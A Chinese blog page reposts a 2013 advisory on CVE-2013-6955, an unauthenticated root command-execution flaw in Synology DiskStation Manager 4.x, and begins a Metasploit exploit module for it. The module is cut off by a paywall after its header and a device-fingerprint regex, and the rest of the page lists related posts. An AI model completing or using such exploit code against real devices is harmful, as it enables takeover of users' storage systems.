群晖运行linux命令,Synology DiskStation Manager 'imageSelector.cgi'远程命令执行漏洞

最新推荐文章于 2023-10-19 17:39:47 发布
最新推荐文章于 2023-10-19 17:39:47 发布
阅读量1.1k 收藏
点赞数
文章标签: 群晖运行linux命令

发布日期:2013-12-25

更新日期:2013-12-26

受影响系统:

Synology DiskStation Manager 4.x

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 64516

CVE(CAN) ID: CVE-2013-6955

Synology DiskStation Manager是可以提供多任务用户接口的NAS操作系统。

Synology DiskStation Manager 4.x版本的/webman/imageSelector.cgi允许附加任意数据到使用 SLICEUPLOAD 功能的文件,在实现上存在安全漏洞,未经身份验证的用户通过发送特制的HTTP请求,利用此漏洞可以root权限执行任意命令。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##

## This module requires Metasploit: http//metasploit.com/download

## Current source: https://github.com/rapid7/metasploit-framework

###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+)

&junior=\d+&unique=synology_\w+_(?[^&]+)/x

def initialize(info={})

super(update_info(info,

'Name'          => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",

'Description'    => %q{

This module exploits a vulnerability found in Synology DiskStati

最低0.47元/天 解锁文章
星际Erick
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
群晖使用Linux命令,群晖常用指令
weixin_42526166的博客
04-29 6027
输入uname –a 回车,用 uname 命令能够看到 NAS 的 CPU 架构、指令集等内容如下:Linux DSM 3.10.105 #23739 SMP Fri Jun 8 12:51:05 CST 2018 x86_64 GNU/Linux synology_braswell_216+II使用命令 docker info 查看docker详细信息,如果提示 Cannot connect ...
最新系统漏洞--Synology Photo Station SQL注入漏洞
weixin_48555088的博客
10-20 1696
最新系统漏洞2021年10月15日 受影响系统: Synology Photo Station < 6.8.14-3500 描述: CVE(CAN) ID: CVE-2021-29089 Synology Photo Station是中国台湾群晖科技(Synology)公司的一套用于在互联网上共享图片、视频和博客的解决方案。 Synology Photo Station 6.8.14-3500之前版本的缩略图组件存在SQL注入漏洞远程攻击者可通过未指定的向量利用该漏洞执行任意SQL命令。 <*
Synology DiskStation 管理器中存在管理员接管漏洞
smellycat000的专栏
10-19 800
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Synology 公司的 DiskStation Manager (DSM) 中存在一个中危漏洞,可用于窃取管理员密码并远程劫持账户。Claroty 公司的研究员 Sharon Brizinov 在报告中提到,“在某些极少见的条件下,攻击者可泄露足够信息,恢复伪随机码生成器 (PRNG) 的种子,重构管理员密码并远程接管管理员账号。”该漏洞的编号...
群晖执行php,群晖已发布DSM更新对PHPMailer中的漏洞进行修复
weixin_36321633的博客
03-12 521
群晖(Synology)昨天向旗下的 NAS 操作系统 DSM 发布了安全更新,该更新主要解决 PHPMailer 中的漏洞。PHPMailer 是被广泛应用于 PHP 中发送邮件的函数包,该组件此前被安全研究人员发现存在严重的安全漏洞群晖的 DSM 操作系统中提供的部分服务也会使用到 PHPMailer,因此也需要及时修复漏洞防止发送攻击行为。群晖在本月 11 日已经针对 PHPMailer ...
西部数据、群晖 NAS 漏洞暴露数百万用户的文件
smellycat000的专栏
08-11 1269
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士IoT 和工业网络安全公司 Claroty 在西部数据和群晖 NAS 产品中发现了多个严重漏洞,可暴露数百万用户的文件。这些漏洞及利用已在2022年12月 ZDI 多伦多 Pwn2Own 大赛上展示。西部数据和群晖已发布补丁(某些情况下是自动推送)并发布安全公告,将漏洞告知客户。群晖发布了一份安全公告,西部数据分别在12月份、1月份和5月份发布...
dsm5.0 mysql_群晖针对OpenSSL Heartbleed安全漏洞推出DSM 5.0更新
weixin_42359449的博客
03-03 358
群晖科技Synology® 今日发布最新版 DSM 5.0-4458 Update 2 以解决 OpenSSL 的 CVE-2014-0160 安全漏洞 (又称为 Heartbleed bug)。OpenSSL 是现今最为广泛运用的网络加密技术之一,也被许多网站所采用,Synology 已采取立即行动:DSM 5.0 的使用者,请按照 Synology 产品安全性咨询的指示更新 DSM 和 SS...
群晖FileManager管理工具
07-24
在安装和使用群晖FileManager时,只需解压缩提供的SynologyFileManager文件包,然后在“bin”目录下运行synology-file-manager.exe”即可启动程序。初次使用可能需要配置NAS的IP地址和登录凭证,以建立连接。确保...
homebridge-synology:使用Homekit控制Synology Diskstation
02-03
使用Apple-Homekit控制Synology Diskstation。 支持DSM 5.x和6.x 安装 按照中的说明安装Homebridge服务器。 该插件是通过发布的,应通过键入以下命令进行“全局”安装: sudo npm install -g homebridge-synology...
Synology File Manager-1.0.2-0017.exe
06-24
Synology File Manager
群晖6.1虚拟机安装包测试通过
01-20
群晖6.1虚拟机安装包
Synology 群晖MR2200ac路由器拆机图.pdf
12-03
Synology群晖MR2200ac路由器:探索Mesh网络与三频技术的智能解决方案》 Synology群晖MR2200ac路由器是一款专为现代家庭和小型办公室设计的高端路由器,它以其强大的Mesh网络功能和三频技术支持而备受瞩目。这款...
群晖emby安装文件emby-server-synology_4.5.4.0_x86_64.spk
02-05
群晖、黑群晖emby服务端
linux 增加自动恩物,「4bays」窮人備份恩物! Synology DiskStation 418
weixin_35671798的博客
05-11 96
Synology DiskStation 418處於數據幾何級增長及病毒肆虐的時代,資料備份相信對企業、家庭或個人用戶應該並不陌生,或許面對過加密病毒或硬碟磁區損壞的用家應更為深刻,而 Synology 最新推出非 Intel 的備份平台「DS418」,以親民的價格和不俗的性能作招來,吸引有意體驗 Synology NAS 的家庭及入門級用戶,讓重要的個人資料及數據更早一步被 Synology N...
linux很多命令用不了 例如: ls: command not found
qq_41848129的博客
07-25 1088
出现这个问题的原因是系统环境变量没有正确配置 我的问题是添加PATH的时候 写成了$path (写成小写的了) 下面是解决的方法: 1.先用:echo $PATH 发现PATH丢失的东西 /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin 2.然后用临时环境变量: export PATH=$...
典型软件供应链安全风险实例分析
glb111的博客
04-01 813
本文是学习而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们。
Web框架下安全漏洞的测试反思
weixin_34297704的博客
10-18 231
此文已由作者王婷英授权网易云社区发布。欢迎访问网易云社区,了解更多网易技术产品运营经验。在平时的测试中,一般情况下,我们都是比较关注功能业务测试,以及对应的接口测试,很少去关注对应的业务设计上存在的安全漏洞测试分析。随着行业对安全的要求越来越高,同时我们电商是经常在网络上发生交易操作的网站,更是要关注安全测试相关的测试场景的考虑。之所以来编写这篇web的里的安全测试的文章,主要是在平时的测试过程中...
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 2636
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
易语言源码易语言http下载模块源码易语言源码易语言http下载模块源码
最新发布
08-05
http,易语言源码易语言http下载模块源码易语言源码易语言http下载模块源码
群晖Synology DiskStation SNMP MIB库指南
"Synology_DiskStation_MIB - 群晖SNMP的MIB库文档" Synology DiskStation MIB指南是针对群晖NAS设备的一份重要文档,它详细介绍了如何通过SNMP(简单网络管理协议)来管理和监控群晖DiskStation。SNMP是一种广泛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值